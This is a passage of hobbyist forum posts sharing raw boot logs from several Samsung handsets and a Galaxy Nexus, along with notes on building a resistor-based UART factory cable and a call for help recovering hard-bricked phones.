<6>zram: Creating 1 devices ...
<6>WM8994 Audio Codec 0.1
wm8994_extensions: initializing driver v10
<6>s3c_idma_preallocate_buffer: VA-f00c0000 PA-C0000000 163840bytes
<6>asoc: WM8994 PAIFRX <-> samsung-i2s.0 mapping ok
<6>ALSA device list:
<6> #0: smdkc110
<6>oprofile: using arm/armv7
<6>GACT probability NOT on
<6>Mirror/redirect action on
<6>u32 classifier
<6> Actions configured
<6>Netfilter messages via NETLINK v0.30.
<6>nf_conntrack version 0.5.0 (4257 buckets, 17028 max)
<6>ctnetlink v0.93: registering with nfnetlink.
<6>NF_TPROXY: Transparent proxy support initialized, version 4.1.0
<6>NF_TPROXY: Copyright (c) 2006-2007 BalaBit IT Ltd.
<6>xt_time: kernel timezone is -0000
<6>ip_tables: (C) 2000-2006 Netfilter Core Team
<6>arp_tables: (C) 2002 David S. Miller
<6>TCP cubic registered
<6>NET: Registered protocol family 10
<6>mmc0: new high speed MMC card at address 0001
<6>Mobile IPv6
<6>ip6_tables: (C) 2000-2006 Netfilter Core Team
<6>mmcblk0: mmc0:0001 M2G1DD 1.91 GiB
<6>IPv6 over IPv4 tunneling driver
<6> mmcblk0: p1 p2 p3
<6>NET: Registered protocol family 17
<6>NET: Registered protocol family 15
<6>Bluetooth: RFCOMM TTY layer initialized
<6>Bluetooth: RFCOMM socket layer initialized
<6>Bluetooth: RFCOMM ver 1.11
<6>Bluetooth: BNEP (Ethernet Emulation) ver 1.3
<6>Bluetooth: HIDP (Human Interface Emulation) ver 1.2
<6>NET: Registered protocol family 35
<6>VFP support v0.3: implementor 41 architecture 3 part 30 variant c rev 2
<6>ThumbEE CPU extension supported.
<6>s5pv210_cpufreq_init: S5PV210 cpu-freq driver
<6>regulator_init_complete: pd_mfc_supply: disabling
<6>regulator_init_complete: pd_tv_supply: disabling
<6>regulator_init_complete: pd_cam_supply: disabling
## wifi_probe
wifi_set_power = 1
wifi_set_carddetect = 1
<4>mmc1: queuing unknown CIS tuple 0x80 (50 bytes)
<4>mmc1: queuing unknown CIS tuple 0x80 (7 bytes)
<4>mmc1: queuing unknown CIS tuple 0x80 (3 bytes)
<6>mmc1: new SDIO card at address 0001
F1 signature read @0x18000000=0x9934329
DHD: dongle ram size is set to 294912(orig 294912)
wl_create_event_handler thr:3d started
dhd_attach thr:3e started
dhd_attach thr:3f started
dhd_attach thr:40 started
Broadcom Dongle Host Driver: register interface [wlan0] MAC: 00:90:4c:11:22:33
Dongle Host Driver, version 5.90.195.104
Compiled in drivers/net/wireless/bcmdhd on Nov 5 2013 at 22:34:41
wifi_set_power = 0
=========== WLAN placed in RESET ========
<6>s3c-rtc s3c2410-rtc: rtc disabled, re-enabling
<6>s3c-rtc s3c2410-rtc: setting system clock to 2010-12-31 23:07:37 UTC (1293836857)
<6>FIMC0 registered successfully
<6>FIMC1 registered successfully
<6>FIMC2 registered successfully
<6>S5P TVOUT Driver, (c) 2010 Samsung Electronics
<4>clk_get: could not find clock mout_vpll_src for dev s5p_device_tvout+0x8/0xd8 (s5p-tvout)
<3>failed to find clock "mout_vpll_src"
<6>s5p-tvout s5p-tvout: hpd status: cable removed/not connected
<6>s5p_tv_probe TV Probing is done
<6>max8998_charger_probe : MAX8998 Charger Driver Loading
<6>max8998_charger_probe : pmic interrupt registered
<6>check_lpm_charging_mode : lpm_charging_mode(0)
<6>wake enabled for irq 39
<7>s3c_bat_discharge_reason : Current charge level : 50%
Current time : 6 discharging_time : 0
discharging reason : 0
<7>max8998_charging_control : USB charging enabled
<6>max8998_set_cable : status(1)
<7>max8998_charging_control : USB charging enabled
<7>s3c_bat_discharge_reason : Current charge level : 50%
Current time : 6 discharging_time : 21606
discharging reason : 0
<4>Warning: unable to open an initial console.
<7>init_post begin
<6>Freeing init memory: 6204K
<7>max8998_charging_control : USB charging enabled
OHAI, stage1 init starting
<7>s3c_bat_discharge_reason : Current charge level : 50%
Current time : 6 discharging_time : 21606
discharging reason : 0
<7>max8998_charging_control : USB charging enabled
<7>s3c_bat_discharge_reason : Current charge level : 50%
Current time : 56 discharging_time : 21606
discharging reason : 0
<7>max8998_charging_control : USB charging enabled
<3>bio too big device loop0 (2 > 0)
<3>EXT4-fs (loop0): unable to read superblock
<6>EXT4-fs (loop1): mounted filesystem with ordered data mode. Opts: (null)
<7>s3c_bat_discharge_reason : Current charge level : 50%
Current time : 80 discharging_time : 21606
discharging reason : 0
<7>max8998_charging_control : USB charging enabled
stage1 log:
Fri Dec 31 23:07:37 GMT 2010
Creating filesystem with parameters:
Size: 18874368
Block size: 4096
Blocks per group: 32768
Inodes per group: 1152
Inode size: 256
Journal blocks: 1024
Label:
Blocks: 4608
Block groups: 1
Reserved block group size: 7
Created filesystem with 11/1152 inodes and 1110/4608 blocks
Creating filesystem with parameters:
Size: 419430400
Block size: 4096
Blocks per group: 32768
Inodes per group: 6400
Inode size: 256
Journal blocks: 1600
Label:
Blocks: 102400
Block groups: 4
Reserved block group size: 31
Created filesystem with 11/25600 inodes and 3310/102400 blocks
force_recovery: 1
losetup: /dev/loop0: No such file or directory
mount: mounting /dev/loop0 on /system failed: Invalid argument
umount: can't umount /system: Invalid argument
losetup: /dev/loop2: No such device or address
losetup: /dev/loop0: No such device or address
5708 blocks
Fri Dec 31 23:09:02 GMT 2010
<3>init: cannot open '/initlogo.rle'
.
.
.
Taken from XXLA1 with zImage only... cm-10.1-wave-v2.1...
Interesting to see this...
Code:
<6>Memory: 69MB 214MB 0MB = 283MB total
<5>Memory: 272496k/325052k available, 17988k reserved, 0K highmem
<5>Virtual kernel memory layout:
vector : 0xffff0000 - 0xffff1000 ( 4 kB)
fixmap : 0xfff00000 - 0xfffe0000 ( 896 kB)
DMA : 0xff000000 - 0xffe00000 ( 14 MB)
vmalloc : 0xf0000000 - 0xfc000000 ( 192 MB)
lowmem : 0xc0000000 - 0xeff00000 ( 767 MB)
modules : 0xbf000000 - 0xc0000000 ( 16 MB)
.init : 0xc0008000 - 0xc0617000 (6204 kB)
.text : 0xc0617000 - 0xc0ce8000 (6980 kB)
.data : 0xc0ce8000 - 0xc0d34880 ( 307 kB)
.bss : 0xc0d348a4 - 0xc0e76ad8 (1289 kB)
Best Regards
This is my solution for now... with S8500. Tested by me.
In theory should work with S8530 too...
Later I will move to cable solution with Micro USB + Resistor...
Then hopefully this is working also with S8600 and S5250 for instance...
Best Regards
http://forum.xda-developers.com/showpost.php?p=41670635&postcount=5
In this FPM Mode... I can use AT Commands via UART...
So for now I can read and write something via UART...
Later more...
Best Regards
Made today few stupid mistakes....
510 R instead K...
Then confuse Pin 4 and 5 ...
I have 510 KOHM, but nothing happens...
Maybe not correct enough...
http://forum.xda-developers.com/showthread.php?t=820275
Code:
RID_FM_BOOT_ON_UART, /* 1 1 1 0 1 619K Factory Mode Boot ON-UART */
I have used 620 KOHM with S8500 and S8600...
Factory Test Mode start ... this thingie with blue then green Screen... but nothing UART out nor input...
Maybe my wires wrong...
Will buy more Resistors...
Best Regards
Edit 1.
No idea yet, where is my mistake...
http://www.droidforums.net/forum/dr...own-motorola-factory-cable-4.html#post2234017
Backside Pinout...
I have now 510 KOHM + 13 KOHM = 523 KOHM...
Flashed to XXJEB to be sure...
Edit 2.
Check up...
My USB converter is alive...
Pin 4 and 5 should be correct, because Resistor Values working...
Will change Pin 2 and 3...
My fault...
For S8530 and S8500 now working.
Code:
[PAM: ] OneNAND physical base address : 0xb0000000
[PAM: ] OneNAND virtual base address : 0xb0000000
[PAM: ] FSR_PAM_InitNANDController Success!!
[PAM: ] --FSR_PAM_Init
bl3_info_block 1 age = 17
bl3_info_block 2 age = 18
BL3_2 Loading
+-------------------------------+
| Bootloader Shadowing FINISHED |
+-------------------------------+
Launch Image at 0x42080000
[BOOT_V1.0 (Jan 5 2012, 19:05:00)]
SelectBootingMode: H/W...0x3.
[BOOT] ARMCLK: 400000 KHz, MSYSHCLK 200000 KHz,MSYSPCLK: 100000 KHz, [BOOT] DSYSHCLK 166750 KHz,DSYSPCLK: 83375 KHz,PSYSHCLK: 133400 KHz, PSYSPCLK: 66700 KHz,SYSCON_A2M: 200000 KHz
Flash_Unlock failed
Poweron status - 20
FSA9480 0x03 Register = 1
FSA9480 0x0A Register = 0
FSA9480 0x0B Register = 8
FSA9480 0x07 Register = 1c
SelectBootingMode: Boot Mode = 1...
+++FIMD_Drv_INITIALIZE
FIMD_Drv_ChangeMode: MDNIE_MODE
Frame Rate:62 SCLK_FIMD:133400 kHz ClkDiv:4
---FIMD_Drv_INITIALIZE
---FIMD_Drv_SetWinOnOff(WIN4:1)
LCD initialize Finished
Display_LSI_Boot : disp_Main_Clean
Display_LSI_Boot : disp_Main_Clean_All
Display_LSI_Boot : disp_dimming_backlight
Display_LSI_Boot : disp_Normal_Init
DRV_modem_reset!!!!!!!!!!!!!!!!!
DRV_Send_DBL!!!!!!!!!!!!!!!!!
[DLOAD] Download Completed !!!
DRV_Wait_ModemInit!!!!!!!!!!!!!!!!!
DRV_CopyQSCBootBinary!!!!!!!!!!!!!!!!!
DRV_Send_BootBinaryCopyComplete!!!!!!!!!!!!!!!!!
DRV_Modem_BootingStart retry count = 0.
AST_POWERON
get_usb_sw_nv 0x40000
USBSwitch : AP
get_uart_sw_nv 0x40000
UARTSwitch : AP
My S8530 first UART output... with cable.
On XXKK5 with S8600 no luck... will try older Firmware...
Best Regards
Edit 1.
S8000 Jet
Code:
USBSwitch : AP
[BB31] VDD INT 1.2V
[BB31] VDD ARM 1.325V
ARM Clock: 400MHz --> 800MHz
[BOOT][DBG] RST_STAT 0x7E00_F904 : 0x00000001
[BOOT] ARMCLK: 800000, MPLL: 194000, HCLKX2: 266666, HCLK: 133333, PCLK: 33333
BootHWCheck: 6...
SelectBootingMode: H/W...0x6.
Poweron status - 10
pPowerOn 0 = 0xB00717E3
pPowerOn 1 = 0x0
pPowerOn 2 = 0x0
pPowerOn 3 = 0x10
pPowerOn 4 = 0x0
pPowerOn 5 = 0x0
pPowerOn 6 = 0x0
pPowerOn 7 = 0x0
pPowerOn 8 = 0x0
pPowerOn 9 = 0x0
pPowerOn 10 = 0x0
pPowerOn 11 = 0x0
pPowerOn 12 = 0x6
pPowerOn 13 = 0x0
FSA9480 0x03 Register = 1
FSA9480 0x0A Register = 0
FSA9480 0x0B Register = 8
FSA9480 0x07 Register = 1C
SelectBootingMode: Boot Mode = 1...
================================
LCD Source CLK -> MPLL(194000)
================================
uClkVal = 0x7 , uClkDir = 0x1
========================================
uVidconReg = 0x1D4 , uClkVal = 0x7
========================================
DRV_modem_reset!!!!!!!!!!!!!!!!!
DRV_Send_DBL!!!!!!!!!!!!!!!!!
[DLOAD] Download Completed !!!
DRV_Wait_MSMInit!!!!!!!!!!!!!!!!!
DRV_CopyMSMBootBinary!!!!!!!!!!!!!!!!!
DRV_Send_BootBinaryCopyComplete!!!!!!!!!!!!!!!!!
Ownership Release 0x5DFFF800, 0x0
AST_POWERON
get_usb_sw_nv 0x0
USBSwitch : AP
get_uart_sw_nv 0x0
UARTSwitch : AP
Drv_TaskEntry Start
DRV_Device_Init...
DRV_Device_Init...: DRV_hwversion = 6.
FSA9480 device ID = 40
JIT UART OFF NU_PWM_FID_SET_GPIO_PWMTOUT ok
prox_sensor_init SUCCESS~~~~~~~~~~~
[BOOT][Err] LCD_DET set PULLDOWN .
[LCD] ESD interrupt enable
acc_sensor_init SUCCESS~~~~~~~~~~~
pif_TaskEntry Start
[MODEMIF_AP_Init] NU_Create_Task pif task success
Create TESTMODE_Queue
Create testmode_task
Create TMFIFO_Queue
Create TESTMODE_RPT_Timer
brcm_bluetooth_main: Start Bluetooth Thread by BootEntry
0002 000.082 0.001.00.00:0000 SYSTEM > MochaTask: OSAL created.
0003 000.084 0.001.00.00:0000 BOOTMGR > MochaTask: OSAL created.
0004 000.091 0.001.00.00:0000 BOOTMGR > MochaTask: UART, USB, and Bluetooth created.
usb_api_open
usb_api_open
0005 000.100 0.001.00.00:0000 SYSTEM > MochaTask: DiagMgr created.
0006 000.106 0.001.00.00:0000 BOOTMGR > MochaTask: DiagMgr created.
0007 000.112 0.001.00.00:0000 EXCEPTION > __MemAllocForDebugHeap: Allocate 1200Kbytes (file OEM\OemDevFIFO.c, line 106)
0008 000.122 0.001.00.00:0000 AGENT > [__SysSecureBootRegisterPktRcvCallback:SysSecureBootPacket.c] __SysSecureBootRegisterPktRcvCallback is called!
0009 000.136 0.001.-1.-1:0000 BOOTMGR > MochaTask: EventMgr created.
0010 000.144 0.001.-1.-1:0000 BOOTMGR > MochaTask: AvMedia created.
0011 000.148 0.001.-1.-1:0000 ALL > DevGetHomeDLFlag : Address(0x0f940000) flag(0x0000ffff)
0012 000.157 0.001.-1.-1:0000 BOOTMGR > MochaTask: Clock created.
0013 000.162 0.001.-1.-1:0000 BOOTMGR > MochaTask: LED created.
0014 000.168 0.001.-1.-1:0000 BOOTMGR > MochaTask: Flip created.
0015 000.174 0.001.-1.-1:0000 SYSTEM > MochaTask: Clock, LED, Flip created.
+SDHC_Open(Ch1)
[SDHC] SDHC(ch1) Operating Clock : 378906Hz
[DS] data_srvc_task() Enter
[DS] diag_srvc_task() Enter
Diag_TaskEntry Start
I9000 tested with success...
So my cable works now with different Samsung handsets...
Except S8600 ...
Tested also with XXKJ7...
Need few days. Then test with S5250 will follow...
http://forum.xda-developers.com/showthread.php?t=1901376
I9001 is a little bit similar to S8600... maybe helpful.
Also useful about UART:
http://forum.xda-developers.com/showthread.php?t=1209288
http://forum.xda-developers.com/showthread.php?t=1629359
Best Regards
UART on S5250 works, but not much info... yet...
Code:
AST_POWERON
*MRDY: 1
,~Booting Completed
This is output, if DL Mode...
Code:
AST_DOWNLOAD
I can set UART Logging temporarily...
More text...
Best Regards
Hey guys. I'm doing some work to figure out how to recover Galaxy Nexus devices which are hard-bricked, i.e. they have a bad or no bootloader installed.
The boot sequence
1. IROM - the Internal ROM which cannot be rewritten on the device. This loads the XLoader.
2. XLoader/MLO - This completes the initialization of the processor and memory, and loads up the relatively huge U-Boot (Samsung modified this and calls it SBL).
3. UBoot/SBL - This "Bootloader" is almost a complete operating system. The U-Boot initializes the screen, provides Odin mode, Fastboot Mode as well as loading the kernel/recovery and provides a UART debugging mode (yet to be unlocked).
4. Kernel - Once we reach this point, it's all clear. The kernel is Linux, which loads Android and all sorts of other things.
The Problem
People are bricking their devices at stage 2 and 3 of this boot sequence... This leaves them unable to boot Fastboot or Odin. The device is 100% interchangeable with a brick. These devices are ending up hard bricked.
The solution
We must come up with a way to undo the hard brick. Here are some things I'm looking at to use the native hardware to recover itself.
When you plug in the device (when off), you will immediately notice a Texas Instruments D010 device gets enumerated. This is a debug mode for the processor.
Code:
Bus 001 Device 023: ID 0451:d010 Texas Instruments, Inc.
We've started looking at some bootloader output here: http://forum.xda-developers.com/showthread.php?t=1461986
You can find information about the OMAP4 bootloaders here: http://omapedia.org/wiki/Bootloader_Project
Help
I need help locating drivers to initialize the 0451:d010 device and make it readable from within Linux or Windows.. Generally Linux is easier to find appropriate drivers.
I could use some help collecting more reading materials and resources.
I think together as a community we can take care of this problem.
I kinda forgot that thread, it got lost among rom/kernel threads. Thanks for the reminder.
sent from my i9250
Ok... so here's the most complete boot log I've been able to obtain from the device
Code:
[Thermal] OK to boot
Initialize runtime thermal monitoring ...done!
-- OMAP 00004460 (version 04460e11) PPA release 1.6.1 Hash 30639809--
Device type: HS, DEBUG OFF
CPFROM HAL API support integrated
THERMAL support integrated: Run Time + Boot time
HDCP support integrated
-- PROD PPA RC3.2.3 --
Reset reason = 00037ba2
PRM_RSTST = 00000002
PPA freed 2992 bytes
Texas Instruments X-Loader 1.41 (Nov 16 2011 - 16:28:45)
Starting OS Bootloader from MMC/SD1 ...
EXCEPTION : CM_CLKMODE_DPLL_ABE = 0x7
EXCEPTION : CM_IDLEST_DPLL_ABE = 0x1
EXCEPTION : CM_CLKSEL_DPLL_ABE = 0x804018
EXCEPTION : CM_CLKMODE_DPLL_CORE = 0xf
EXCEPTION : CM_IDLEST_DPLL_CORE = 0x1
EXCEPTION : CM_CLKSEL_DPLL_CORE = 0x7d05
EXCEPTION : CM_CLKMODE_DPLL_PER = 0x107
EXCEPTION : CM_IDLEST_DPLL_PER = 0x1
EXCEPTION : CM_CLKSEL_DPLL_PER = 0x1400
EXCEPTION : CM_CLKMODE_DPLL_MPU = 0x117
EXCEPTION : CM_IDLEST_DPLL_MPU = 0x1
EXCEPTION : CM_CLKSEL_DPLL_MPU = 0x807d07
CFG_LOADADDR = 0xa0208000
1st instruct = 0xEA000007
[ __omap_twl6030_init_vbat_cfg :49] SA_PHOENIX_START_CONDITION = 0x4a
[ __omap_twl6030_init_vbat_cfg :54] SA_PH_CFG_VBATLOWV = 0x80
[ __omap_twl6030_init_vbat_cfg :63] SA_PH_CFG_VBATLOWV = 0x80
[ __omap_twl6030_init_vbat_cfg :86] SA_BBSPOR_CFG = 0x78
====== VCELL : 381375, SOC : 49, nType : 5 ======
[Charger] nScaledVCELL : 381375000, nDesriedSOC, : 62, nMaxSOC : 82, nMinSOC : 42
[ omap_power_get_reset_source :47] PRM_RSTST : 0x2
[ __omap_usbacc_test_donwload_by_musb :280] nDeviceType : 0x5
[ omap_usbacc_get_reboot_reason :333] nJigStatus = 0x00000003
[ __sbl_board_hw_init_late :719] final reboot mode in cable = 0x40000
[ __sbl_board_hw_init_late :730] Wake up by TA / USB / JIG
* FB base addr = 0xbea70000!
* PANEL_S6E8AA0_ID_READ : 0x12, 0x8e, 0x9f.
[ omap_power_get_reset_source :47] PRM_RSTST : 0x2
dev : 5
[sbl_board_charger_init_post] : Succeed set model data : 0x78!!!!!
====== VCELL : 381500, SOC : 50, nType : 5 ======
[Charger] nScaledVCELL : 381500000, nDesriedSOC, : 62, nMaxSOC : 82, nMinSOC : 42
[ omap_power_get_reset_source :47] PRM_RSTST : 0x1
[ __omap_usbacc_test_donwload_by_musb :280] nDeviceType : 0x5
[ omap_usbacc_get_reboot_reason :333] nJigStatus = 0x00000003
[ __sbl_board_hw_init_late :719] final reboot mode in cable = 0x40000
[ __sbl_board_hw_init_late :730] Wake up by TA / USB / JIG
* FB base addr = 0xbea70000!
* PANEL_S6E8AA0_ID_READ : 0x12, 0x8e, 0x9f.
[ omap_power_get_reset_source :47] PRM_RSTST : 0x1
message.command =
message.status =
message.recovery =
<hit enter twice to activate fiq debugger>
[Thermal] OK to boot
Initialize runtime thermal monitoring ...done!
-- OMAP 00004460 (version 04460e11) PPA release 1.6.1 Hash 30639809--
Device type: HS, DEBUG OFF
CPFROM HAL API support integrated
THERMAL support integrated: Run Time + Boot time
HDCP support integrated
-- PROD PPA RC3.2.3 --
Reset reason = 0003fba2
PRM_RSTST = 00000002
PPA freed 2992 bytes
Texas Instruments X-Loader 1.41 (Nov 16 2011 - 16:28:45)
Starting OS Bootloader from MMC/SD1 ...
EXCEPTION : CM_CLKMODE_DPLL_ABE = 0x7
EXCEPTION : CM_IDLEST_DPLL_ABE = 0x1
EXCEPTION : CM_CLKSEL_DPLL_ABE = 0x804018
EXCEPTION : CM_CLKMODE_DPLL_CORE = 0xf
EXCEPTION : CM_IDLEST_DPLL_CORE = 0x1
EXCEPTION : CM_CLKSEL_DPLL_CORE = 0x7d05
EXCEPTION : CM_CLKMODE_DPLL_PER = 0x107
EXCEPTION : CM_IDLEST_DPLL_PER = 0x1
EXCEPTION : CM_CLKSEL_DPLL_PER = 0x1400
EXCEPTION : CM_CLKMODE_DPLL_MPU = 0x117
EXCEPTION : CM_IDLEST_DPLL_MPU = 0x1
EXCEPTION : CM_CLKSEL_DPLL_MPU = 0x807d07
CFG_LOADADDR = 0xa0208000
1st instruct = 0xEA000007
[ __omap_twl6030_init_vbat_cfg :49] SA_PHOENIX_START_CONDITION = 0x8
[ __omap_twl6030_init_vbat_cfg :54] SA_PH_CFG_VBATLOWV = 0x80
[ __omap_twl6030_init_vbat_cfg :63] SA_PH_CFG_VBATLOWV = 0x80
[ __omap_twl6030_init_vbat_cfg :86] SA_BBSPOR_CFG = 0x78
====== VCELL : 381375, SOC : 50, nType : 5 ======
[Charger] nScaledVCELL : 381375000, nDesriedSOC, : 62, nMaxSOC : 82, nMinSOC : 42
[ omap_power_get_reset_source :47] PRM_RSTST : 0x2
[ __omap_usbacc_test_donwload_by_musb :280] nDeviceType : 0x5
[ omap_usbacc_get_reboot_reason :333] nJigStatus = 0x00000003
[ __sbl_board_hw_init_late :719] final reboot mode in cable = 0x40000
[ __sbl_board_hw_init_late :730] Wake up by TA / USB / JIG
* FB base addr = 0xbea70000!
* PANEL_S6E8AA0_ID_READ : 0x12, 0x8e, 0x9f.
[ omap_power_get_reset_source :47] PRM_RSTST : 0x2
<hit enter twice to activate fiq debugger>
Communications established====== VCELL : 381375, SOC : 50, nType : 5 ======
[Charger] nScaledVCELL : 381375000, nDesriedSOC, : 62, nMaxSOC : 82, nMinSOC : 42
* FB base addr = 0xbea70000!
* PANEL_S6E8AA0_ID_READ : 0x12, 0x8e, 0x9f.
[ omap_power_get_reset_source :47] PRM_RSTST : 0x2
<hit enter twice to activate fiq debugger>
debug> console
console mode
[ 3.320373] cannot apply mgr(lcd) on inactive device
[ 3.325805] omapfb omapfb: failed to apply dispc config
[ 3.331359] cannot apply mgr(tv) on inactive device
[ 3.336578] omapfb omapfb: failed to apply dispc config
[ 3.341949] cannot apply mgr(lcd2) on inactive device
[ 3.347167] omapfb omapfb: failed to apply dispc config
[ 3.354888] regulator_init_complete: VDAC: disabling
[ 3.361053] omaplfb OMAPLFBInitFBDev: Device 0: Requesting 4 TILER 2D framebuffers
[ 3.369232] ## wifi_probe
[ 3.371917] wifi_set_power = 1
[ 3.631866] wifi_set_carddetect = 1
[ 3.647338]
[ 3.647338] Dongle Host Driver, version 5.90.125.94
[ 3.647338] Compiled in drivers/net/wireless/bcmdhd on Nov 21 2011 at 19:05:54
[ 3.764984] mmc1: queuing unknown CIS tuple 0x80 (7 bytes)
[ 3.817810] mmc1: queuing unknown CIS tuple 0x80 (3 bytes)
[ 3.837463] mmc1: new high speed SDIO card at address 0001
[ 3.844818] F1 signature read @0x18000000=0x16844330
[ 3.859436] DHD: dongle ram size is set to 294912(orig 294912)
[ 3.866546] wl_create_event_handler thr:5b started
[ 3.871673] dhd_attach thr:5c started
[ 3.875488] dhd_attach thr:5d started
[ 3.879272] dhd_attach thr:5e started
[ 3.883148] wifi_get_mac_addr
[ 3.888519] Broadcom Dongle Host Driver: register interface [wlan0] MAC: 00:90:4c:11:22:33
[ 3.897430] wifi_set_power = 0
[ 4.157012] =========== WLAN placed in RESET ========
[ 4.163116] fsa9480 4-0025: cable detect change, from 'unknown/none' to 'uart'
[ 4.171203] twl_rtc twl_rtc: setting system clock to 2012-05-13 00:25:12 UTC (1336868712)
[ 4.180816] Freeing init memory: 276K
[ 4.187561] init (1): /proc/1/oom_adj is deprecated, please use /proc/1/oom_score_adj instead.
[ 4.214172] max17040 4-0036: online = 1 vcell = 3795000 soc = 48 status = 3 health = 1 temp = 330 charger status = 0
[ 4.288116] keychord: using input dev tuna-gpio-keypad for fevent
[ 4.354614] EXT4-fs (mmcblk0p10): mounted filesystem with ordered data mode. Opts: (null)
[ 4.446746] mms_ts 3-0048: fw version 0x62 already present
[ 4.454498] mms_ts 3-0048: Melfas MMS-series touch controller initialized
[ 4.757202] omap-rproc omap-rproc.1: Loaded BIOS image ducati-m3.bin, size 4489868
[ 4.765838] omap-rproc omap-rproc.1: BIOS image version is 2
[ 4.785888] omap-iommu omap-iommu.0: iommu_get: ducati qos_request
[ 4.806243] omap_hwmod: ipu: failed to hardreset
[ 4.811035] omap-iommu omap-iommu.0: ducati: version 2.1
[ 4.822448] omap-rproc omap-rproc.1: remote processor ipu is now up
[ 4.835571] omap_rpmsg_mbox_callback: received echo reply from ipu !
[ 4.842071] omap_rpmsg_mbox_callback: received echo reply from ipu !
[ 4.848541] omap_rpmsg_mbox_callback: received echo reply from ipu !
[ 4.855072] omap_rpmsg_mbox_callback: received echo reply from ipu !
[ 4.861816] virtio_rpmsg_bus virtio0: creating channel rpmsg-client-sample addr 0x32
[ 4.869812] virtio_rpmsg_bus virtio0: creating channel rpmsg-client-sample addr 0x33
[ 4.877899] virtio_rpmsg_bus virtio0: creating channel rpmsg-omx addr 0x3c
[ 4.885192] rpmsg_omx rpmsg-omx0: new OMX connection srv channel: 1024 -> 60!
[ 5.959960] EXT4-fs (mmcblk0p12): recovery complete
[ 5.974639] EXT4-fs (mmcblk0p12): mounted filesystem with ordered data mode. Opts: nomblk_io_submit,errors=panic
[ 6.021484] virtio_rpmsg_bus virtio1: creating channel rpmsg-omx addr 0x3c
[ 6.029602] rpmsg_omx rpmsg-omx1: new OMX connection srv channel: 1024 -> 60!
[ 6.170227] EXT4-fs (mmcblk0p11): recovery complete
[ 6.178833] EXT4-fs (mmcblk0p11): mounted filesystem with ordered data mode. Opts: nomblk_io_submit,errors=panic
[ 6.199371] EXT4-fs (mmcblk0p3): mounted filesystem with ordered data mode. Opts: (null)
[ 6.269744] android_usb: already disabled
[ 6.274810] mtp_bind_config
[ 6.277740] adb_bind_config
[ 6.297790] HDCP: loaded keys
[ 6.481079] warning: `adbd' uses 32-bit capabilities (legacy support in use)
[ 6.488433] adb_open
[ 6.702026] init: sys_prop: permission denied uid:1001 name:net.rmnet1.dns1
[ 6.709808] init: sys_prop: permission denied uid:1001 name:net.rmnet1.dns2
[ 6.718780] init: sys_prop: permission denied uid:1001 name:net.rmnet1.gw
[ 6.726196] init: sys_prop: permission denied uid:1001 name:net.rmnet2.dns1
[ 6.733612] init: sys_prop: permission denied uid:1001 name:net.rmnet2.dns2
[ 6.741455] init: sys_prop: permission denied uid:1001 name:net.rmnet2.gw
[ 6.749481] PVR: Installing MISR with cookie c0800c2c
[ 6.757415] PVR: Installing device LISR SGX ISR on IRQ 53 with cookie c7aa2700
[ 6.766174] PVR: OSUnMapPhysToLin: unmapping 65535 bytes from c8be0000
[ 6.773162] PVR: SysFinalise: Version string: SGX revision = 1.2.0
[ 6.797027] [MODEM_IF] misc_open : umts_boot0
[ 6.801666] omap_hsi omap_hsi.0: HSI clock is now 96000000
[ 6.824066] omap_hsi omap_hsi.0: Entering RX wakeup in 3 wires mode (no CAWAKE)
[ 6.831634] [MODEM_IF] xmm6260_off()
[ 6.835327] [MODEM_IF] PA EVENT : reset =0, pa=1
[ 6.840057] [MODEM_IF] umts_ipc0 state changed: OFFLINE
[ 6.845367] [MODEM_IF] xmm6260_on()
[ 6.866821] SMC: SecureCRC=0xBC7458DC
[ 6.959045] [MODEM_IF] PA EVENT : reset =1, pa=0
[ 7.042053] SMC PA: INFO 00000001 00:00:00.000 ------ ------ --------------- Booting... (t=00:25:15.356) SMCXG01.04p11.32196 /Widevine Integration
[ 7.058532] SMC PA: INFO 00000002 00:00:00.017 ------ ------ --------------- Booted
[ 7.238128] [MODEM_IF] misc_release : umts_boot0
[ 7.245147] omap_hsi omap_hsi.0: hsi_write_cancel ch 0
[ 7.251708] omap_hsi omap_hsi.0: __hsi_write_cancel : -125
[ 7.258941] omap_hsi omap_hsi.0: hsi_read_cancel ch 0
[ 7.265106] omap_hsi omap_hsi.0: __hsi_read_cancel : -125
[ 7.270629] omap_hsi omap_hsi.0: __hsi_write_cancel : -61
[ 7.276794] omap_hsi omap_hsi.0: __hsi_read_cancel : -61
[ 7.282470] [MODEM_IF] misc_open : umts_boot1
[ 7.287506] omap_hsi omap_hsi.0: Entering RX wakeup in 4 wires mode
[ 8.299774] misc dsscomp: [c7234000] ignoring set failure -22
[ 8.530609] s6e8aa: d/b 1, p 1, b-01390ffb
[ 8.530639] s6e8aa: c0, 1, b-001215fb, got v 3534794, factory wants 3529338
[ 8.530670] s6e8aa: c1, 1, b-00478927, got v 3764175, factory wants 3755229
[ 8.530700] s6e8aa: c2, 1, b-0012a421, got v 3486385, factory wants 3481495
[ 8.530731] s6e8aa: d/b 1, p 2, b-044d7cf9
[ 8.530761] s6e8aa: c0, 2, b-00bc6c9a, got v 3336878, factory wants 3330014
[ 8.530761] s6e8aa: c1, 2, b-01688d4e, got v 3556595, factory wants 3547367
[ 8.530792] s6e8aa: c2, 2, b-00a7db92, got v 3293516, factory wants 3285750
[ 8.530822] s6e8aa: d/b 1, p 3, b-0b323808
[ 8.530853] s6e8aa: c0, 3, b-026395cd, got v 3203365, factory wants 3194725
[ 8.530883] s6e8aa: c1, 3, b-0331a9fb, got v 3435905, factory wants 3424659
[ 8.530914] s6e8aa: c2, 3, b-021e3100, got v 3149091, factory wants 3139262
[ 8.530944] s6e8aa: d/b 1, p 4, b-186611f4
[ 8.530944] s6e8aa: c0, 4, b-062b8517, got v 3065435, factory wants 3053644
[ 8.531036] s6e8aa: c1, 4, b-0725b7f8, got v 3297279, factory wants 3284148
[ 8.531249] s6e8aa: c2, 4, b-053f8b4b, got v 3005194, factory wants 2992315
[ 8.531280] s6e8aa: d/b 1, p 5, b-6840e4ff
[ 8.531311] s6e8aa: c0, 5, b-221c3d41, got v 2688265, factory wants 2667329
[ 8.531341] s6e8aa: c1, 5, b-24fd4a51, got v 2906316, factory wants 2884895
[ 8.531372] s6e8aa: c2, 5, b-1d67176e, got v 2594260, factory wants 2571400
[ 8.531402] s6e8aa: d/b 1, p 6, b-ffffffff
[ 8.531433] s6e8aa: c0, 6, b-59b1b4d2, got v 2325286, factory wants 2292333
[ 8.531463] s6e8aa: c1, 6, b-60d28a3e, got v 2534439, factory wants 2499333
[ 8.531463] s6e8aa: c2, 6, b-4efd2a80, got v 2197307, factory wants 2162000
[ 11.727386] [MODEM_IF] misc_release : umts_boot1
[ 11.732147] omap_hsi omap_hsi.0: hsi_write_cancel ch 0
